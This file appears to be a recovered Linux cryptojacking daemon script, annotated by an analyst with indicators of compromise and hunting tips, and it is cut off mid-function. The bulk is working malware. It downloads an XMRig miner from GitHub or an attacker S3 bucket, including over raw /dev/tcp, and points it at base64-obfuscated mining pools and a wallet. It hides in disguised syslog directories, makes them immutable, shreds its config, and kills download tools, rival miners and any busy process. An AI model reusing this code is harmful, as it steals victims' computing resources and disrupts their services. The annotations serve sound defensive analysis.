PATH: usr/share/man/man3/.syslog-cf6ec2b3
#!/bin/bash
# ---------------------------------------------------------------------------
# Analyst annotations. Line breaks are restored for readability; the code
# itself is unchanged.
#
# What this script does, as visible below:
#   * sources a ".malware.conf" file and then destroys it,
#   * takes a PID lock in the deploy directory,
#   * loops forever: kills download tools, and every TICK_MOD iterations
#     re-installs/restarts an XMRig miner and kills other miners and any
#     process at or above 70% CPU that it does not recognise as its own.
#
# Hunting pointers that follow directly from the code:
#   * hidden ".syslog-*" directories under the paths listed in
#     find_and_read_config (man pages, /var/log, /tmp, /dev/shm, ...),
#   * the immutable attribute on such a directory (set with chattr +i when
#     running as root) - check with lsattr -d,
#   * curl/wget/interpreter processes dying with SIGKILL shortly after start,
#   * egress to the hosts decoded in the ENC_* block below.
#
# MALWARE_NAME, DAEMON_NAME, DEPLOY_DIR, BASE_DOMAIN, FIXED_MINER_NAME and
# ENCODE_BASE are read below but only assigned here in the no-config
# fallback (and DEPLOY_DIR in the directory search) - presumably they come
# from the sourced .malware.conf; confirm against a recovered copy.
# ---------------------------------------------------------------------------
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

# Decode a base64 string: tries `base64 -d`, `base64 --decode`, then
# `openssl base64 -d`. If every decoder is missing or fails, the input is
# echoed back unchanged.
b64d() {
  local s="$1"
  if command -v base64 >/dev/null 2>&1; then
    printf '%s' "$s" | base64 -d 2>/dev/null && return 0
    printf '%s' "$s" | base64 --decode 2>/dev/null && return 0
  fi
  if command -v openssl >/dev/null 2>&1; then
    printf '%s' "$s" | openssl base64 -d 2>/dev/null && return 0
  fi
  echo "$s"
}

# Base64 is used only to hide strings from plain-text searches; it is not
# encryption. Decoded values (for blocklists and log searches):
#   ENC_BASE_URL            https://cts-assets.s3.us-west-1.amazonaws.com
#   ENC_MINER_X86_URL       <base>/grep.tar.gz
#   ENC_MINER_ARM_URL       <base>/grep_arm.tar.gz
#   ENC_CONFIG_URL          <base>/grep.json
#   ENC_CONFIG_FALLBACK_URL <base>/grepn.json
#   ENC_SELF_URL            <base>/grepb2.jpg
#   ENC_GITHUB_X86_URL      https://github.com/xmrig/xmrig/releases/download/v6.26.0/xmrig-6.26.0-linux-static-x64.tar.gz
#   ENC_GITHUB_ARM_URL      same release, xmrig-6.26.0-linux-static-arm64.tar.gz
#   ENC_DEFAULT_POOL_URL    auto.c3pool.org:33333
#   ENC_CUSTOM_POOL_URL     pool.supportxmr.com:443
# The two *_WALLET_ADDR values are the same base64 string (not decoded here).
ENC_BASE_URL="aHR0cHM6Ly9jdHMtYXNzZXRzLnMzLnVzLXdlc3QtMS5hbWF6b25hd3MuY29t"
ENC_MINER_X86_URL="aHR0cHM6Ly9jdHMtYXNzZXRzLnMzLnVzLXdlc3QtMS5hbWF6b25hd3MuY29tL2dyZXAudGFyLmd6"
ENC_MINER_ARM_URL="aHR0cHM6Ly9jdHMtYXNzZXRzLnMzLnVzLXdlc3QtMS5hbWF6b25hd3MuY29tL2dyZXBfYXJtLnRhci5neg=="
ENC_CONFIG_URL="aHR0cHM6Ly9jdHMtYXNzZXRzLnMzLnVzLXdlc3QtMS5hbWF6b25hd3MuY29tL2dyZXAuanNvbg=="
ENC_CONFIG_FALLBACK_URL="aHR0cHM6Ly9jdHMtYXNzZXRzLnMzLnVzLXdlc3QtMS5hbWF6b25hd3MuY29tL2dyZXBuLmpzb24="
#ENC_DAEMON_URL="PLACEHOLDER_ENC_DAEMON_URL"
ENC_SELF_URL="aHR0cHM6Ly9jdHMtYXNzZXRzLnMzLnVzLXdlc3QtMS5hbWF6b25hd3MuY29tL2dyZXBiMi5qcGc="
ENC_GITHUB_X86_URL="aHR0cHM6Ly9naXRodWIuY29tL3htcmlnL3htcmlnL3JlbGVhc2VzL2Rvd25sb2FkL3Y2LjI2LjAveG1yaWctNi4yNi4wLWxpbnV4LXN0YXRpYy14NjQudGFyLmd6"
ENC_GITHUB_ARM_URL="aHR0cHM6Ly9naXRodWIuY29tL3htcmlnL3htcmlnL3JlbGVhc2VzL2Rvd25sb2FkL3Y2LjI2LjAveG1yaWctNi4yNi4wLWxpbnV4LXN0YXRpYy1hcm02NC50YXIuZ3o="
ENC_DEFAULT_POOL_URL="YXV0by5jM3Bvb2wub3JnOjMzMzMz"
ENC_DEFAULT_WALLET_ADDR="ODdtYVlndDdiTXZnRHhRc0JhdllOVkRyNkJRZ0pOYWFSS1hnMnlCaDhBM0dMVm9pekNxOWVleWNCVDd2Nmtkbm04ZjQxVmZ6ODR4NlhMZUVVSkRScXZZYlNyaHZ6VHc="
ENC_CUSTOM_POOL_URL="cG9vbC5zdXBwb3J0eG1yLmNvbTo0NDM="
ENC_CUSTOM_WALLET_ADDR="ODdtYVlndDdiTXZnRHhRc0JhdllOVkRyNkJRZ0pOYWFSS1hnMnlCaDhBM0dMVm9pekNxOWVleWNCVDd2Nmtkbm04ZjQxVmZ6ODR4NlhMZUVVSkRScXZZYlNyaHZ6VHc="

# Runtime (decoded) copies of the values above.
BASE_URL=$(b64d "$ENC_BASE_URL")
MINER_X86_URL=$(b64d "$ENC_MINER_X86_URL")
MINER_ARM_URL=$(b64d "$ENC_MINER_ARM_URL")
CONFIG_URL=$(b64d "$ENC_CONFIG_URL")
CONFIG_FALLBACK_URL=$(b64d "$ENC_CONFIG_FALLBACK_URL")
#DAEMON_URL=$(b64d "$ENC_DAEMON_URL")
SELF_URL=$(b64d "$ENC_SELF_URL")
GITHUB_X86_URL=$(b64d "$ENC_GITHUB_X86_URL")
GITHUB_ARM_URL=$(b64d "$ENC_GITHUB_ARM_URL")
DEFAULT_POOL_URL=$(b64d "$ENC_DEFAULT_POOL_URL")
DEFAULT_WALLET_ADDR=$(b64d "$ENC_DEFAULT_WALLET_ADDR")
CUSTOM_POOL_URL=$(b64d "$ENC_CUSTOM_POOL_URL")
CUSTOM_WALLET_ADDR=$(b64d "$ENC_CUSTOM_WALLET_ADDR")

# Behaviour switches. These are defaults; the config sourced later runs in
# the same shell and can overwrite any of them.
USE_GITHUB_MINER="1"
GITHUB_VERSION="6.26.0"
ENABLE_CUSTOM_CONFIG="1"
ENABLE_RANDOM_MINER_NAME="1"
ENABLE_PASS_MOD="0"
ENABLE_CONFIG_TWEAKS="1"
SET_DONATE_LEVEL="0"
SET_NICEHASH="true"
SET_TLS="true"
SET_MAX_THREADS_HINT="80"
SET_AUTOSAVE="true"
SET_BACKGROUND="true"
CUSTOM_CONFIG_URL=""

# Pick the column of `ps aux` output that holds the PID: column 2 when the
# header line starts with USER/user, column 1 otherwise.
_PS_PID_COL=2
_ps_hdr=$(ps aux 2>/dev/null | head -1)
case "$_ps_hdr" in
  USER*|user*) _PS_PID_COL=2 ;;
  *) _PS_PID_COL=1 ;;
esac

# Loop cadence: 0.3 s sleeps with maintenance every 17 ticks, or 1 s sleeps
# with maintenance every 5 ticks when `sleep` rejects fractional seconds.
SLEEP_INTERVAL="0.3"
TICK_MOD=17
if ! sleep 0.01 2>/dev/null; then
  SLEEP_INTERVAL="1"
  TICK_MOD=5
fi
# A lock file older than this many seconds is treated as stale.
MAX_LOCK_AGE=300

# Print PIDs whose command line matches $1: pgrep -f when available,
# otherwise a fixed-string grep over `ps aux`.
_pgrep_f() {
  local pattern="$1"
  if command -v pgrep >/dev/null 2>&1; then
    pgrep -f "$pattern" 2>/dev/null
  else
    ps aux 2>/dev/null | grep -v grep | grep -F "$pattern" | awk -v c=$_PS_PID_COL '{print $c}'
  fi
}

# SIGKILL every process whose command line matches $1.
_pkill_f() {
  local pattern="$1"
  if command -v pkill >/dev/null 2>&1; then
    pkill -9 -f "$pattern" 2>/dev/null
  else
    _pgrep_f "$pattern" | xargs kill -9 2>/dev/null
  fi
}

# Create $DEPLOY_DIR if it is missing (and cd into it in that case).
# Returns 1 only when mkdir fails.
ensure_deploy_dir() {
  if [ ! -d "$DEPLOY_DIR" ]; then
    mkdir -p "$DEPLOY_DIR" || return 1
    cd "$DEPLOY_DIR"
  fi
  return 0
}

# Apply sed expression $1 to file $2 through a "<file>.tmp.<pid>" temp file.
# The file is overwritten only when sed produced non-empty output.
sed_inplace() {
  local expr="$1"
  local file="$2"
  local tmp="${file}.tmp.$$"
  sed "$expr" "$file" > "$tmp" 2>/dev/null
  if [ -s "$tmp" ]; then
    cat "$tmp" > "$file"
    rm -f "$tmp"
    return 0
  fi
  rm -f "$tmp" 2>/dev/null
  return 1
}

# Succeeds when $1 has dotted-quad shape (1-3 digits per octet; the octet
# range is not checked).
is_valid_ip() {
  echo "$1" | grep -qE '^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$'
}

# Build a worker label "miner-<cpu cores>-<public IP with dashes>".
# Network indicator: the host's public IP is looked up via
# https://3.0.3.0/ips, then api.ipify.org, then ipv4.ip.sb; the short
# hostname and finally the literal "node" are the fallbacks.
get_miner_name() {
  local cpu_cores=$(nproc 2>/dev/null || grep -c ^processor /proc/cpuinfo 2>/dev/null || echo "1")
  local ip="" raw=""
  raw=$(curl -s --connect-timeout 2 https://3.0.3.0/ips 2>/dev/null | grep -o '"ip":"[^"]*"' | cut -d'"' -f4)
  is_valid_ip "$raw" && ip="$raw"
  if [ -z "$ip" ]; then
    raw=$(curl -s --connect-timeout 2 --max-filesize 32 https://api.ipify.org 2>/dev/null)
    is_valid_ip "$raw" && ip="$raw"
  fi
  if [ -z "$ip" ]; then
    raw=$(curl -s --connect-timeout 2 --max-filesize 32 https://ipv4.ip.sb 2>/dev/null)
    is_valid_ip "$raw" && ip="$raw"
  fi
  if [ -z "$ip" ]; then
    ip=$(hostname 2>/dev/null | cut -d. -f1)
  fi
  if [ -z "$ip" ]; then
    ip="node"
  fi
  local ip_clean=$(echo "$ip" | tr '.' '-')
  echo "miner-${cpu_cores}-${ip_clean}"
}

# Set MINER_URL to the x86 or ARM archive URL based on `uname -m`;
# unknown architectures fall back to the x86 URL with a warning on stderr.
setup_architecture() {
  local arch=$(uname -m)
  case "$arch" in
    x86_64|amd64) MINER_URL="$MINER_X86_URL" ;;
    aarch64|arm64|armv8*) MINER_URL="$MINER_ARM_URL" ;;
    *) echo " [Daemon] WARNING: Unsupported architecture '$arch', using default" >&2; MINER_URL="$MINER_X86_URL" ;;
  esac
}

# Locate and source ".malware.conf": first in the current directory, then in
# hidden ".syslog-*" directories under two lists of candidate paths. The
# first match is sourced into this shell, DEPLOY_DIR is set to its directory
# (search branches only), and the config file is then destroyed (shred -u,
# or truncate + rm). Forensic consequence: the campaign configuration is
# normally gone from disk once the daemon has started, so capture it from a
# fresh drop or from process memory/environment instead.
# The candidate path lists double as a sweep list for incident responders.
# Returns 1 after setting hard-coded fallback names when nothing is found.
find_and_read_config() {
  if [ -f ".malware.conf" ]; then
    . ./.malware.conf
    if [ "$ENCODE_BASE" = "1" ]; then
      CUSTOM_POOL_URL=$(b64d "$ENC_CUSTOM_POOL_URL")
      CUSTOM_WALLET_ADDR=$(b64d "$ENC_CUSTOM_WALLET_ADDR")
    fi
    if command -v shred >/dev/null 2>&1; then
      shred -u .malware.conf 2>/dev/null
    else
      cat /dev/null > .malware.conf && rm -f .malware.conf
    fi
    return 0
  fi
  # Home directory of the user the script runs as.
  local home_dir=$(eval echo "~" 2>/dev/null)
  for pattern in "${home_dir}/.syslog-*" "/usr/share/man/man3/.syslog-*" "/usr/share/misc/.syslog-*" "/usr/share/doc/.syslog-*" "/var/log/.syslog-*" "/var/cache/.syslog-*" "/var/lib/syslog/.syslog-private-*" "/opt/.syslog-*" "/usr/lib/.syslog-*" "/usr/local/lib/.syslog-*" "/var/tmp/.syslog-*" "/tmp/.syslog-*" "/dev/shm/.syslog-*" "/run/user/*/.syslog-*" "/var/crash/.syslog-*" "/dev/mqueue/.syslog-*" "/run/lock/.syslog-*"; do
    # Unquoted on purpose so the glob in each pattern expands.
    for dir in $pattern; do
      if [ -d "$dir" ] && [ -f "$dir/.malware.conf" ]; then
        . "$dir/.malware.conf"
        DEPLOY_DIR="$dir"
        if [ "$ENCODE_BASE" = "1" ]; then
          CUSTOM_POOL_URL=$(b64d "$ENC_CUSTOM_POOL_URL")
          CUSTOM_WALLET_ADDR=$(b64d "$ENC_CUSTOM_WALLET_ADDR")
        fi
        if command -v shred >/dev/null 2>&1; then
          shred -u "$dir/.malware.conf" 2>/dev/null
        else
          cat /dev/null > "$dir/.malware.conf" && rm -f "$dir/.malware.conf"
        fi
        return 0
      fi
    done
  done
  # Second list; it ends with this sample's own directory name
  # (.syslog-cf6ec2b3), which looks like a per-install identifier.
  for pattern in "/usr/share/man/man3/.syslog-*" "/var/log/.syslog-*" "/opt/.syslog-*" "/usr/lib/.syslog-*" "/var/lib/systemd/.syslog-private-*" "/var/tmp/.syslog-*" "/tmp/.syslog-*" "/dev/shm/.syslog-*" "/usr/share/man/man3/.syslog-cf6ec2b3*" "/usr/share/man/man3/.syslog-cf6ec2b3"; do
    for dir in $pattern; do
      if [ -d "$dir" ] && [ -f "$dir/.malware.conf" ]; then
        . "$dir/.malware.conf"
        DEPLOY_DIR="$dir"
        if [ "$ENCODE_BASE" = "1" ]; then
          CUSTOM_POOL_URL=$(b64d "$ENC_CUSTOM_POOL_URL")
          CUSTOM_WALLET_ADDR=$(b64d "$ENC_CUSTOM_WALLET_ADDR")
        fi
        if command -v shred >/dev/null 2>&1; then
          shred -u "$dir/.malware.conf" 2>/dev/null
        else
          cat /dev/null > "$dir/.malware.conf" && rm -f "$dir/.malware.conf"
        fi
        return 0
      fi
    done
  done
  echo "WARNING: No config found, using /tmp/.syslog-fallback" >&2
  DEPLOY_DIR="/tmp/.syslog-fallback"
  MALWARE_NAME="syslog-ng-fallback"
  CONFIG_NAME="config.json"
  DAEMON_NAME="syslog-helper"
  MINER_NAME="unknown"
  return 1
}

# When running as root and chattr exists, mark the deploy directory
# immutable. Remediation note: rm -rf on the directory fails until the
# attribute is cleared; `lsattr -d <dir>` shows the "i" flag.
protect_deploy_dir() {
  [ "$(id -u 2>/dev/null)" = "0" ] && command -v chattr >/dev/null 2>&1 && chattr +i "$DEPLOY_DIR" 2>/dev/null
}

# Inverse of protect_deploy_dir: clear the immutable attribute (root only).
unprotect_deploy_dir() {
  [ "$(id -u 2>/dev/null)" = "0" ] && command -v chattr >/dev/null 2>&1 && chattr -i "$DEPLOY_DIR" 2>/dev/null
}

# Single-instance guard using "$DEPLOY_DIR/.daemon.lock" (holds the daemon
# PID). A lock older than MAX_LOCK_AGE, or one whose PID is not alive, is
# removed; a fresh lock with a live PID makes this instance exit 1.
# The file's content gives responders the daemon PID to inspect.
check_and_acquire_lock() {
  LOCK_FILE="${DEPLOY_DIR}/.daemon.lock"
  if [ -f "$LOCK_FILE" ]; then
    local lock_pid=$(cat "$LOCK_FILE" 2>/dev/null)
    local lock_age=0
    # GNU stat first (-c %Y), then BSD-style stat (-f %m).
    local file_ts=$(stat -c %Y "$LOCK_FILE" 2>/dev/null) || file_ts=$(stat -f %m "$LOCK_FILE" 2>/dev/null) || file_ts=""
    if [ -n "$file_ts" ] && [ "$file_ts" -gt 0 ] 2>/dev/null; then
      lock_age=$(($(date +%s) - file_ts))
    fi
    if [ $lock_age -gt $MAX_LOCK_AGE ] 2>/dev/null; then
      unprotect_deploy_dir
      rm -f "$LOCK_FILE" 2>/dev/null
      protect_deploy_dir
    elif [ -n "$lock_pid" ] && kill -0 "$lock_pid" 2>/dev/null; then
      exit 1
    else
      unprotect_deploy_dir
      rm -f "$LOCK_FILE" 2>/dev/null
      protect_deploy_dir
    fi
  fi
  unprotect_deploy_dir
  echo $$ > "$LOCK_FILE" 2>/dev/null
  protect_deploy_dir
}

# Fetch URL $1 into file $2 inside $DEPLOY_DIR. Tries wget, then curl, then
# a hand-written HTTP/1.0 GET over bash's /dev/tcp. None of the three paths
# verifies a checksum or signature of what was downloaded.
# Network detection note: the /dev/tcp path always connects to port 80 in
# clear text, even for https:// URLs, so it is visible to plain HTTP
# inspection when wget and curl are absent or fail.
download_file() {
  ensure_deploy_dir || return 1
  cd "$DEPLOY_DIR" 2>/dev/null || return 1
  local url=$1
  local output=$2
  local host=$(echo "$url" | sed 's|^https\?://||' | cut -d/ -f1)
  local path=$(echo "$url" | sed 's|^https\?://[^/]*||')
  if command -v wget >/dev/null 2>&1; then
    wget -q --timeout=10 --tries=2 "$url" -O "$output" 2>/dev/null
    if [ -f "$output" ] && [ -s "$output" ]; then
      return 0
    fi
    rm -f "$output" 2>/dev/null
  fi
  if command -v curl >/dev/null 2>&1; then
    curl -s --connect-timeout 10 --retry 2 "$url" -o "$output" 2>/dev/null
    if [ -f "$output" ] && [ -s "$output" ]; then
      return 0
    fi
    rm -f "$output" 2>/dev/null
  fi
  if command -v bash >/dev/null 2>&1; then
    (
      exec 3<>/dev/tcp/${host}/80 2>/dev/null || exit 1
      echo -e "GET ${path} HTTP/1.0\r\nHost: ${host}\r\n\r\n" >&3
      # Skip the response headers up to the first empty line.
      while IFS= read -r line <&3; do
        line=${line%$'\r'}
        [ -z "$line" ] && break
      done
      cat <&3 > "$output" 2>/dev/null
      exec 3<&-
    ) 2>/dev/null
    if [ -f "$output" ] && [ -s "$output" ]; then
      return 0
    fi
  fi
  return 1
}

# Download the XMRig release archive for architecture $1 into directory $2,
# unpack it, and leave "xmrig.bin" and "config.orig.json" there. Succeeds
# only when both files exist afterwards. File-system indicators while this
# runs: "xmrig.tar.gz" and an "xmrig-*" directory inside the deploy dir.
download_and_extract_github_miner() {
  local arch="$1"
  local output_dir="$2"
  local tar_url=""
  case "$arch" in
    x86_64|amd64) tar_url="$GITHUB_X86_URL" ;;
    aarch64|arm64|armv8*) tar_url="$GITHUB_ARM_URL" ;;
    *) return 1 ;;
  esac
  local temp_tar="${output_dir}/xmrig.tar.gz"
  download_file "$tar_url" "$temp_tar" || return 1
  tar -xzf "$temp_tar" -C "$output_dir" 2>/dev/null || { rm -f "$temp_tar"; return 1; }
  rm -f "$temp_tar"
  local extracted_dir=$(find "$output_dir" -maxdepth 1 -type d -name "xmrig-*" | head -1)
  [ -z "$extracted_dir" ] && return 1
  [ -f "$extracted_dir/xmrig" ] && mv "$extracted_dir/xmrig" "$output_dir/xmrig.bin"
  [ -f "$extracted_dir/config.json" ] && mv "$extracted_dir/config.json" "$output_dir/config.orig.json"
  rm -rf "$extracted_dir"
  [ -f "$output_dir/xmrig.bin" ] && [ -f "$output_dir/config.orig.json" ]
}

# Rewrite miner config file $1 in place with sed: optionally the "pass"
# field (worker name $2 or FIXED_MINER_NAME), the pool "url" and wallet
# "user", and the donate-level / nicehash / tls / max-threads-hint /
# autosave / background settings from the SET_* variables.
# With the defaults above the resulting config.json carries the custom pool
# and wallet, which is what to look for in a recovered config.
apply_config_modifications() {
  local config_file="$1"
  local miner_name="$2"
  if [ "$ENABLE_PASS_MOD" = "1" ]; then
    if [ "$ENABLE_RANDOM_MINER_NAME" = "1" ]; then
      sed_inplace 's/"pass": "[^"]*"/"pass": "'"$miner_name"'"/g' "$config_file"
    else
      sed_inplace 's/"pass": "[^"]*"/"pass": "'"$FIXED_MINER_NAME"'"/g' "$config_file"
    fi
  fi
  if [ "$USE_GITHUB_MINER" = "1" ] && [ "$ENABLE_CUSTOM_CONFIG" = "1" ] && [ -z "$CUSTOM_CONFIG_URL" ]; then
    [ -n "$CUSTOM_POOL_URL" ] && sed_inplace 's|"url": "[^"]*"|"url": "'"$CUSTOM_POOL_URL"'"|g' "$config_file"
    [ -n "$CUSTOM_WALLET_ADDR" ] && sed_inplace 's|"user": "[^"]*"|"user": "'"$CUSTOM_WALLET_ADDR"'"|g' "$config_file"
  fi
  if [ "$ENABLE_CONFIG_TWEAKS" = "1" ]; then
    [ -n "$SET_DONATE_LEVEL" ] && sed_inplace 's/"donate-level": [0-9]\+/"donate-level": '"$SET_DONATE_LEVEL"'/g' "$config_file"
    if [ -n "$SET_NICEHASH" ]; then
      local nicehash_val=$(echo "$SET_NICEHASH" | tr '[:upper:]' '[:lower:]')
      sed_inplace 's/"nicehash": true/"nicehash": '"$nicehash_val"'/g' "$config_file"
      sed_inplace 's/"nicehash": false/"nicehash": '"$nicehash_val"'/g' "$config_file"
    fi
    if [ -n "$SET_TLS" ]; then
      local tls_val=$(echo "$SET_TLS" | tr '[:upper:]' '[:lower:]')
      sed_inplace 's/"tls": true/"tls": '"$tls_val"'/g' "$config_file"
      sed_inplace 's/"tls": false/"tls": '"$tls_val"'/g' "$config_file"
    fi
    [ -n "$SET_MAX_THREADS_HINT" ] && sed_inplace 's/"max-threads-hint": [0-9]\+/"max-threads-hint": '"$SET_MAX_THREADS_HINT"'/g' "$config_file"
    if [ -n "$SET_AUTOSAVE" ]; then
      local autosave_val=$(echo "$SET_AUTOSAVE" | tr '[:upper:]' '[:lower:]')
      sed_inplace 's/"autosave": true/"autosave": '"$autosave_val"'/g' "$config_file"
      sed_inplace 's/"autosave": false/"autosave": '"$autosave_val"'/g' "$config_file"
    fi
    if [ -n "$SET_BACKGROUND" ]; then
      local bg_val=$(echo "$SET_BACKGROUND" | tr '[:upper:]' '[:lower:]')
      sed_inplace 's/"background": true/"background": '"$bg_val"'/g' "$config_file"
      sed_inplace 's/"background": false/"background": '"$bg_val"'/g' "$config_file"
    fi
  fi
}

# SIGKILL download tools and URL-fetching interpreter processes seen in
# `ps aux`, except lines mentioning github.com, $BASE_DOMAIN or $DEPLOY_DIR
# (and $MALWARE_NAME for the second group). Called on every loop iteration.
# Host symptom for responders: curl/wget and scripted HTTP fetches started
# by admins or tooling die almost immediately on an infected machine, which
# also hampers pulling cleanup tools onto the box.
# BASE_DOMAIN is not assigned anywhere in this file.
kill_downloaders() {
  local ps_out=$(ps aux 2>/dev/null)
  local pids=$(echo "$ps_out" \
    | grep -E 'wget|curl|aria2c|axel|lwp-download|lwp-request|fetch ' \
    | grep -v grep \
    | grep -v "github\.com" \
    | grep -v "$BASE_DOMAIN" \
    | grep -v "$DEPLOY_DIR" \
    | awk -v c=$_PS_PID_COL '{print $c}')
  [ -n "$pids" ] && echo "$pids" | xargs kill -9 2>/dev/null
  local pids2=$(echo "$ps_out" \
    | grep -E 'python|perl|php|ruby|nc |netcat|ncat|lynx|links|w3m|ftp ' \
    | grep -v grep \
    | grep -v "github\.com" \
    | grep -v "$BASE_DOMAIN" \
    | grep -v "$MALWARE_NAME" \
    | grep -v "$DEPLOY_DIR" \
    | grep -Ei 'http://|https://|urlretrieve|urlopen|requests\.get|file_get_contents|LWP|getstore|open-uri|/dev/tcp' \
    | awk -v c=$_PS_PID_COL '{print $c}')
  [ -n "$pids2" ] && echo "$pids2" | xargs kill -9 2>/dev/null
}

# Return 0 when PID $1 is this script, or its /proc exe path lies under
# $DEPLOY_DIR, or its command line (from /proc or ps) contains
# "syslog-helper", $MALWARE_NAME or $DEPLOY_DIR. Used as the allow-list for
# the kill routines below.
is_my_process() {
  local pid="$1"
  [ "$pid" = "$$" ] && return 0
  local exe_path=$(readlink -f "/proc/$pid/exe" 2>/dev/null)
  if [ -n "$exe_path" ]; then
    case "$exe_path" in
      ${DEPLOY_DIR}/*) return 0 ;;
    esac
  fi
  local cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ')
  if [ -n "$cmd" ]; then
    case "$cmd" in
      *syslog-helper*|*"$MALWARE_NAME"*|*"$DEPLOY_DIR"*) return 0 ;;
    esac
  fi
  local ps_cmd=$(ps -p "$pid" -o args= 2>/dev/null)
  if [ -n "$ps_cmd" ]; then
    case "$ps_cmd" in
      *"$MALWARE_NAME"*|*syslog-helper*|*"$DEPLOY_DIR"*) return 0 ;;
    esac
  fi
  return 1
}

# Print PIDs whose CPU usage is at or above threshold $1 (default 70),
# using `ps -eo pid,pcpu` and falling back to `ps aux` column 3.
_high_cpu_pids() {
  local threshold="${1:-70}"
  local out
  out=$(ps -eo pid,pcpu 2>/dev/null)
  if [ -n "$out" ]; then
    echo "$out" | awk -v t="$threshold" '$2+0>=t && $1+0>0 {print $1}'
    return
  fi
  ps aux 2>/dev/null | awk -v t="$threshold" -v c=$_PS_PID_COL 'NR>1 && $3+0>=t {print $c}'
}

# Three kill passes against everything is_my_process does not allow-list:
#   1. processes whose ps line matches known miner/pool strings,
#   2. processes whose executable contains miner-related strings,
#   3. every process at or above 70% CPU.
# Pass 3 is not miner-specific: any busy legitimate workload (database,
# build, backup) is SIGKILLed too, so unexplained kills of CPU-heavy
# services are a symptom worth correlating with this infection.
kill_rival_miners() {
  ps aux 2>/dev/null | grep -v grep | grep -E 'xmrig|987645|supportxmr|c3pool|vmiluniz|javap|syslog-ng-13b1b2b7' | grep -v "$MALWARE_NAME" | awk -v c=$_PS_PID_COL '{print $c}' | while read -r pid; do
    is_my_process "$pid" || kill -9 "$pid" 2>/dev/null
  done
  for pid_dir in /proc/[0-9]*; do
    local pid="${pid_dir##*/}"
    is_my_process "$pid" && continue
    if grep -a -q -E 'donate-level|stratum\+tcp|cryptonight|randomx' "$pid_dir/exe" 2>/dev/null; then
      kill -9 "$pid" 2>/dev/null
    fi
  done
  _high_cpu_pids 70 | while read -r pid; do
    is_my_process "$pid" || kill -9 "$pid" 2>/dev/null
  done
}

# Keep exactly one miner process alive. If none is running: fetch the
# binary (GitHub release first, the S3 bucket as fallback), build
# config.json, start "./$MALWARE_NAME" in the background, and on success
# delete the non-hidden files in $DEPLOY_DIR with `rm -f ./*`.
# Forensic consequence of that delete: the running miner is then backed by
# an unlinked file, so look at /proc/<pid>/exe and /proc/<pid>/cwd of the
# suspect process rather than expecting the binary on disk. Hidden files
# (.daemon.lock, .malware.conf) are not matched by ./*.
ensure_miner_running() {
  if command -v chattr >/dev/null 2>&1; then
    chattr -i "$DEPLOY_DIR" 2>/dev/null
  fi
  ensure_deploy_dir || return 1
  cd "$DEPLOY_DIR" 2>/dev/null || return 1
  local existing_pids=$(_pgrep_f "$MALWARE_NAME")
  local pid_count=0
  [ -n "$existing_pids" ] && pid_count=$(echo "$existing_pids" | wc -l | tr -d ' ')
  if [ "$pid_count" -gt 1 ]; then
    echo " [Daemon] Found $pid_count miner processes, cleaning..." >&2
    _pkill_f "$MALWARE_NAME"
    sleep 1
  elif [ "$pid_count" -eq 1 ]; then
    return 0
  fi
  unprotect_deploy_dir
  if [ ! -d "$DEPLOY_DIR" ]; then
    mkdir -p "$DEPLOY_DIR" 2>/dev/null
  fi
  cd "$DEPLOY_DIR" 2>/dev/null || { protect_deploy_dir; return 1; }
  if [ ! -x "$MALWARE_NAME" ]; then
    if [ "$USE_GITHUB_MINER" = "1" ]; then
      echo " [Daemon] Using GitHub official XMRig v$GITHUB_VERSION" >&2
      local arch=$(uname -m)
      if download_and_extract_github_miner "$arch" "$DEPLOY_DIR"; then
        # The stock xmrig binary is renamed to the disguise name.
        mv "$DEPLOY_DIR/xmrig.bin" "$MALWARE_NAME"
        chmod +x "$MALWARE_NAME"
        if [ ! -f "config.json" ]; then
          if [ -n "$CUSTOM_CONFIG_URL" ]; then
            echo " [Daemon] Downloading custom config from $CUSTOM_CONFIG_URL" >&2
            download_file "$CUSTOM_CONFIG_URL" "config.json"
          else
            cp "$DEPLOY_DIR/config.orig.json" "config.json"
          fi
        fi
      else
        echo " [Daemon] GitHub download failed, fallback to S3" >&2
        setup_architecture
        download_file "$MINER_URL" "$MALWARE_NAME"
        chmod +x "$MALWARE_NAME"
        if [ ! -f "config.json" ]; then
          download_file "$CONFIG_URL" "config.json"
        fi
      fi
    else
      setup_architecture
      download_file "$MINER_URL" "$MALWARE_NAME"
      chmod +x "$MALWARE_NAME"
      if [ ! -f "config.json" ]; then
        download_file "$CONFIG_URL" "config.json"
      fi
    fi
  fi
  if [ ! -f "config.json" ]; then
    if [ "$USE_GITHUB_MINER" = "1" ] && [ -f "config.orig.json" ]; then
      cp config.orig.json config.json
    else
      download_file "$CONFIG_URL" "config.json"
    fi
  fi
  if [ -f "config.json" ]; then
    local miner_name_for_config="x"
    if [ "$ENABLE_RANDOM_MINER_NAME" = "1" ]; then
      if [ -z "$MINER_NAME" ] || [ "$MINER_NAME" = "unknown" ]; then
        MINER_NAME=$(get_miner_name)
        echo " [Daemon] Generated miner name: $MINER_NAME" >&2
      fi
      miner_name_for_config="$MINER_NAME"
    fi
    apply_config_modifications "config.json" "$miner_name_for_config"
  fi
  if [ ! -x "$MALWARE_NAME" ]; then
    protect_deploy_dir
    return 1
  fi
  # Output is discarded, so the miner leaves no log of its own here.
  "./$MALWARE_NAME" > /dev/null 2>&1 &
  sleep 2
  local new_pids=$(_pgrep_f "$MALWARE_NAME")
  local new_count=0
  [ -n "$new_pids" ] && new_count=$(echo "$new_pids" | wc -l | tr -d ' ')
  if [ "$new_count" -eq 1 ]; then
    echo " [Daemon] ✓ Miner started (PID: $new_pids)" >&2
    (cd "$DEPLOY_DIR" && rm -f ./*) 2>/dev/null
    #rmdir "$DEPLOY_DIR" 2>/dev/null
    protect_deploy_dir
    return 0
  elif [ "$new_count" -gt 1 ]; then
    echo " [Daemon] ⚠ Multiple miners started ($new_count), keeping first..." >&2
    local first_pid=$(echo "$new_pids" | head -1)
    echo "$new_pids" | tail -n +2 | xargs kill -9 2>/dev/null
    echo " [Daemon] ✓ Miner running (PID: $first_pid)" >&2
    (cd "$DEPLOY_DIR" && rm -f ./*) 2>/dev/null
    #rmdir "$DEPLOY_DIR" 2>/dev/null
    protect_deploy_dir
    return 0
  else
    if [ "$USE_GITHUB_MINER" = "1" ] && [ -z "$CUSTOM_CONFIG_URL" ]; then
      echo " [Daemon] WARNING: Miner failed to start, trying fallback config..." >&2
      if download_file "$CONFIG_FALLBACK_URL" "config.json"; then
        apply_config_modifications "config.json" "$miner_name_for_config"
        "./$MALWARE_NAME" > /dev/null 2>&1 &
        sleep 3
